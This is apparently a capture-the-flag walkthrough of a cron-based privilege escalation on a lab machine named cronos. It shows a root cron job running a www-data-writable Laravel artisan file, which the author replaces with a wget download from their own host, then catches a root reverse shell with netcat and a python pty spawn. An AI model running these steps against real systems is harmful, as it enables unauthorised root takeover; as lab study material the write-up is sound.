5 privesc cronjob

cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * *       root    php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1

# root runs this command every minute (the `* * * * *` entry above)
php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1

www-data@cronos:/var/www/laravel$ ls -la /var/www/laravel/artisan
-rwxr-xr-x 1 www-data www-data 1646 Apr  9  2017 /var/www/laravel/artisan

# the file is owned by www-data (see above), so we can replace it and wait for the cron job to execute it as root

www-data@cronos:/var/www/laravel$ wget 10.10.16.161/artisan
# wget saves the download as artisan.1 because a file named artisan already exists
www-data@cronos:/var/www/laravel$ mv artisan.1 artisan

$ nc -lvnp 9000
listening on [any] 9000 ...
connect to [10.10.16.161] from (UNKNOWN) [10.10.10.13] 54362
SOCKET: Shell has connected! PID: 3123
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
root@cronos:~# whoami;id
whoami;id
root
uid=0(root) gid=0(root) groups=0(root)
